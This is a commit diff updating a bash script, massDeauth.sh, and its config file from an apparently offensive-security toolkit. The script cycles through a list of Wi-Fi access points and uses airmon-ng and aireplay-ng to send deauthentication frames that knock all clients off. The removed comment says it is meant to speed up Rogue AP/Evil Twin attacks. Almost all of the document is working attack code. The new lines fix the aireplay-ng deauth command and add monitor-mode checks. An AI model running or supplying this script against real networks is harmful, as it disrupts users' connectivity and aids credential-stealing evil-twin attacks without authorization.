Updated massDeauth.sh script.

networks/wpa2-enterprise-utils/config.txt

@@ -9,6 +9,6 @@ retry = 3
 
 # Here comes a list of APs to attack. The list entry form is following:
 #	target = <essid> <bssid> <channel>
-target = test 00:11:22:33:44:55 14
-target = test2 00:11:22:33:44:55 14
-target = test3 00:11:22:33:44:55 14
+target = SomeAP 00:11:22:33:44:55 1
+target = OtherAP 00:11:22:33:44:55 2
+target = AnotherAP 00:11:22:33:44:55 3

networks/wpa2-enterprise-utils/massDeauth.sh

@@ -1,32 +1,9 @@
 #!/bin/bash
 
 #
-# Simple script intended to perform mass-deauthentication of
-# any associated&authenticated client to the Access-Point.
-# Helpful to actively speed up Rogue AP/Evil Twin attacks in 
-# multiple Access-Points within an ESSID environments. 
-#
-# In other words, if you have an ESSID set up from many
-# access-points (BSSIDs) - this script will help you
-# deauthenitcate all clients from those APs iteratively.
-#
-# Expected config file must obey the following format:
-#	-----------------------------------------------
-#	# Specify an interface
-#	iface = wlp4s0
-#	
-#	# Number of deauths
-#	deauths = 3
-#	
-#	# Retry deauths, 0 - infinity
-#	retry = 3
-#	
-#	# Here comes a list of APs to attack. The list entry form is following:
-#	#	target = <essid> <bssid> <channel>
-#	target = test 00:11:22:33:44:55 14
-#	target = test2 00:11:22:33:44:55 14
-#	target = test3 00:11:22:33:44:55 14
-#	-----------------------------------------------
+# This is a massive WLAN deauthentication attacking script
+# that takes as input list of APs against which should deauth be launched,
+# and then attempts that attack.
 #
 # Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
 #
@@ -36,6 +13,11 @@ if [ $# -ne 1 ]; then
 	exit 1
 fi
 
+if [ $EUID -ne 0 ]; then
+	echo "[!] This script must be launched as root."
+	exit 1
+fi
+
 function deauthClients {
 	echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch"
 	iface=$1
@@ -44,27 +26,43 @@ function deauthClients {
 	ch=$4
 	deauths=$5
 
-	airmon-ng stop $iface @> /dev/null
+	airmon-ng stop ${iface}mon @> /dev/null
+	sleep 2
 
 	echo -e "\t[1] Starting monitor on channel $ch"
 	airmon-ng start $iface $ch @> /dev/null
+	sleep 3
+
+	if [ -z "$(ls /sys/class/net | paste | grep ${iface}mon)" ]; then
+		echo "[!] Could not start monitor interface! Will try again..."
+		sleep 3
+		return
+	fi
 	
 	echo -e "\t[2] Deauthing $deauths number of times..."
-	aireplay-ng --deauth $deauths -a $essid $iface
+	aireplay-ng --deauth $deauths -e $essid -a $bssid ${iface}mon
 }
 
 config=$(cat $1 | grep -vE '^#')
 retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-)
-deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-)
+deauths=$(echo "$config" | grep 'deauths' | grep '=' | awk '{print $3}')
 iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-)
 
 echo "Using interface: $iface"
+echo "Retry count: $retry"
+echo "Deauths to be sent: $deauths"
+
+if [ -n "$(ps -eF | grep -v grep | grep airodump)" ]; then
+	echo "[!] Airodump-ng is running: will not stick to one channel."
+	echo "[!] Please kill airodump-ng first, then proceed further."
+	exit 1
+fi
 
-IFS=$'\n'
 if [ $retry -eq 0 ]; then
 	retry=99999999
 fi
 
+IFS=$'\n'
 for i in $(seq 0 $retry); do
 	echo -e "\n[$i] Deauthing clients..."
 	for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do
@@ -72,6 +70,16 @@ for i in $(seq 0 $retry); do
 		bssid=$(echo "$line" | awk '{print $2}')
 		ch=$(echo "$line" | awk '{print $3}')
 
+		if [ -z $ch ]; then
+			echo "[!] You must specify <channel> for ESSID: $essid"
+			exit 1
+		fi
+
+		if [ -z $bssid ]; then
+			echo "[!] You must specify <bssid> for ESSID: $essid"
+			exit 1
+		fi
+		
 		deauthClients $iface $essid $bssid $ch $deauths
 	done
 done